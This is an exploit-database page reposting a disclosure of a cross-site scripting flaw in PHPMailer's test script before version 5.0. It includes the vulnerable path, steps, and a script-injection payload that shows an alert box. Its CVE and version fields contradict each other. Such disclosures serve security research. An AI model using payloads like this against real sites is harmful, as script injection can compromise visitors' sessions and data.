Advertisement






PHPMailer Test Page < 5.0 Cross-Site-Scripting

CVE Category Price Severity
CVE-2018-19296 CWE-79 $1,000 High
Author Risk Exploitation Type Date
exploit_alert_team High Remote 2018-07-07
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070071

Below is a copy:

PHPMailer Test Page < 5.0 Cross-Site-Scripting
# Exploit Title: PHPMailer Test Page < 5.0 Cross-Site-Scripting
# Date: 2018-07-06 
# Exploit Author: Omba
# Vendor Homepage: https://github.com/PHPMailer
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: [5.0]
# CVE: N/A
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
  
# Vulnerable Parameter Type: GET 
# Vulnerable Parameter: www.example.com/phpmailer/test_script/ 
  
# Proof of Concepts:
  
www.example.com/phpmailer/test_script/
  
fill in all the fields "Mail Details"

Payload: ><script>alert(/Xss-By-Omba/)</script>

and click Submit.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum